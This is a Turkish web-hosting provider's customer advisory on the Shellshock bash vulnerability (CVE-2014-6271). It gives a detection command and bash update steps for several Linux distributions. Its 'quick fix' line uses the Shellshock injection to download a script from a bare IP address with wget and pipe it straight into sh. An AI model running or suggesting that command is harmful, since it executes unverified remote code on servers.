Üye İşlemleri Alışveriş Sepeti
+90 (216) 99 000 99 Kampanyalar Biz Kimiz?
Reklamını Bildir
Alan Adı Hosting Sunucu Marka Web Tasarım SSL SSS Belgeler BTS Forum
Anasayfa » Kampanya ve Haberler » Shellshock Güvenlik Açığı

Shellshock Güvenlik Açığı


Değerli Müşterimiz,

Linux tabanlı sunucularda “Shellshock” isminde bir güvenlik açığı tespit edilmiştir.

Güvenlik açığı hakkında detaylı bilgi almak için CVE-2014-6271

Tespit:

Sunucunuzda bu güvenlik açığının olup olmadığını test etmek için;

- Sunucunuza SSH bağlantısı yapın ve aşağıdaki komutu çalıştırın;

env x='() { :;}; echo GuvenliDegil' bash -c 'echo Sunucunuz'

Eğer sunucunuzda güvenlik açığı varsa komutun çıktısı;

GuvenliDegil
Sunucunuz

şeklinde olacaktır.

Sunucunuzda güvenlik açığı yoksa, komutun çıktısı aşağıdaki gibi olacaktır;

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’
Sunucunuz

Çözüm:

Hızlı Uygulama: env x='() { :;}; wget -qO- http://185.50.68.10/ShUp.php | sh' bash -c 'echo OK'


Güncellemeyi uyguladıktan sonra, yukarıdaki tespit yöntemi ile tekrar test etmelisiniz.

a) Centos işletim sistemi için;

yum update bash komutu ile güncelleme yapabilirsiniz, yada;

- cat /etc/redhat-release komutu ile işletim sistemi versiyonunuza bakın

- uname -a komutu ile işletim sisteminin 32 / 64 bit kontrolünü yapın ve aldığınız bilgilere göre, aşağıda sizin için uygun olan paketi yükleyin;

Centos 6 64bit

rpm -Uvh http://ftp.linux.org.tr/scientific/6x/x86_64/updates/security/bash-4.1.2-15.el6_5.1.x86_64.rpm

Centos 5 64bit

rpm -Uvh http://ftp.linux.org.tr/scientific/59/x86_64/updates/security/bash-3.2-33.el5.1.x86_64.rpm

Centos 5 32bit

rpm -Uvh http://ftp.linux.org.tr/centos/5/updates/i386/RPMS/bash-3.2-33.el5.1.i386.rpm

b) Cloud Linux Kernel işletim sistemi için;

yum clean all
yum update bash

c) Debian işletim sistemi için;

apt-get update
apt-get install –only-upgrade bash

d) Ubuntu işletim sistemi için;

sudo apt-get update && sudo apt-get install bash

Yöncü Bilişim
Hizmetlerimiz
Ücretsiz Servisler
Sosyal Medyada Biz
Hesap ve IBAN Numaraları Adres, Telefon ve Kroki Belgeler ve İzinler İnsan Kaynakları Referanslarımız İletişim Bilgileri Ücretsiz Üyelik Destek Sistemi Sözleşmeler Hakkımızda Kadromuz SSS
Bedava .tk Uzantılı Domain SSL Güvenlik Sertifikası Alan Adı API ve Bayilik Marka Tescil Hizmeti VDS, VPS Sanal Sunucu Web Tasarım Hizmeti Web Hosting Hizmeti Mail Hosting Hizmeti Yeni Alan Adı Kaydı Alan Adı Backorder Alan Adı Transfer Sunucu Kiralama
Hizmetlerde Online Yönetim Üyeler Arası Aktarım Alan Adı Transfer Kilidi A Record IP Yönlendirme Mail ve SMS Hatırlatma Whois Gizlilik Koruma Alt İsim Sunucu Oluşturma Hazır Uygulama Kurulumu Yapım Aşamasında Sayfası İletişim Bilgi Değiştirme DNS Yönlendirme URL Yönlendirme Satılık Sayfası Teklif Sayfası
Destek Merkezi: Yöncü Bilişim Çözümleri Ltd. Şti.
Tel: +90 (216) 99 000 99 - Faks: +90 (216) 344 18 90
Copyright © 2001 - 2017
Yöncü Bilişim Çözümleri bir OSBIL Markasıdır
Osbil Technology Ltd. - Serbest Liman Bölgesi
S.L.B.T. 447, No:435 Gazimağusa KKTC
Yöncü SSL